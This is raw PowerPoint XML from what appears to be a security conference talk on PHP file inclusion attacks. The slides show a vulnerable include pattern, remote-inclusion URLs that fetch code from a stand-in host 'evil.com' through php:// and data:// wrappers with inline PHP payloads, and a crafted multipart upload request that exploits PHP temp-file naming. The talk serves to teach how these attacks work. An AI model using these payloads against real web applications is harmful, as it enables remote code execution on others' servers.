        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST requests with multiform-data file attachments creates temporary files which are deleted upon exit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary files created as c:\temp\phpXXXX.tmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XXXX is hexadecimal value from Unique (timestamp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>16bit = 65,535 possible combinations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be brute forced, or thanks to PHP quirks, we can do this …..</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60008926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ON STEROIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1268760"/>
            <a:ext cx="8496944" cy="5040559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>lfitest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>lfi.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>: multipart/form-data; boundary=---------------------------1475782385918929021760237462</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>Content-Length: 364</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>-----------------------------1475782385918929021760237462</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>Content-Disposition: form-data; name="file1"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>Content-Type: application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>-php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>(); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>-----------------------------1475782385918929021760237462</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>Content-Disposition: form-data; name="page"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>C:\temp\php&lt;&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>-----------------------------1475782385918929021760237462--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32265760"/>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File inclusion attacks are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>un </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n steroids!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236854961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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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1340768"/>
            <a:ext cx="4021038" cy="5428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9334014"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File inclusions is one of the most popular attacks against PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers attack web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers on steroids</a:t>
            </a:r>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HACKERS ON STEROIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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196752"/>
            <a:ext cx="6408712" cy="5126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849534"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File inclusions is one of the most popular attacks against PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers attack web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers on steroids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers + File inclusions = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FILE INCLUSIONS ON STEROIDS!!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402097483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What is file inclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traditional attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Secrit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tecniqus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FILE INCLUSIONS ON STEROIDS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2086190402"/>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Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>File inclusion attacks exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>"dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>with malicious code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Two flavours, remote and local.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>File inclusion attacks may use, but are not directory traversal attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001304588"/>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&lt;?php     include(“$_GET[module]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>classfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerable to both remote and local file inclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4098856694"/>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Remote Inclusions</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Networked files via \\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Streams / wrappers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>file://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>http(s)://</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>ftp://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>php://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>zlib://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>data://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>glob://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>phar://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>ssh2://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>rar://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>ogg://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>expect://</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869698570"/>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Stream examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>localhost/fitest/rfi.php?page=http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>evil.com/pwn.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>://localhost/fitest/rfi.php?page=php://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>filter/resource=http://evil.com/pwn.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>://localhost/fitest/rfi.php?page=data://text/plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,&lt;?php+phpinfo();+?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>http://localhost/fitest/rfi.php?page=data://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2851748377"/>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Stratsec presentation 0 1">
  <a:themeElements>
    <a:clrScheme name="1_stratsesec presentation template 0 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stratsesec presentation template 0 1">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stratsesec presentation template 0 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stratsesec presentation template 0 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stratsesec presentation template 0 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stratsesec presentation template 0 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stratsesec presentation template 0 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stratsesec presentation template 0 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stratsesec presentation template 0 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Stratsec presentation 0 1</Template>
  <TotalTime>229</TotalTime>
  <Words>548</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>115</Paragraphs>
  <Slides>18</Slides>
  <Notes>0</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Stratsec presentation 0 1</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>HACKERS ON STEROIDS</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Example:</vt:lpstr>
      <vt:lpstr>Remote Inclusions</vt:lpstr>
      <vt:lpstr>Stream examples</vt:lpstr>
      <vt:lpstr>php://input stream example</vt:lpstr>
      <vt:lpstr>Local inclusions</vt:lpstr>
      <vt:lpstr>Truncation technique</vt:lpstr>
      <vt:lpstr>Funny characters </vt:lpstr>
      <vt:lpstr>Examples, examples, examples</vt:lpstr>
      <vt:lpstr>ON STEROIDS</vt:lpstr>
      <vt:lpstr>ON STEROIDS</vt:lpstr>
      <vt:lpstr>Summary</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inclusion on steroids</dc:title>
  <cp:lastModifiedBy>Eldar Marcussen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-06-03T01:24:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-15T00:18:02Z</dcterms:modified>
</cp:coreProperties>
</file>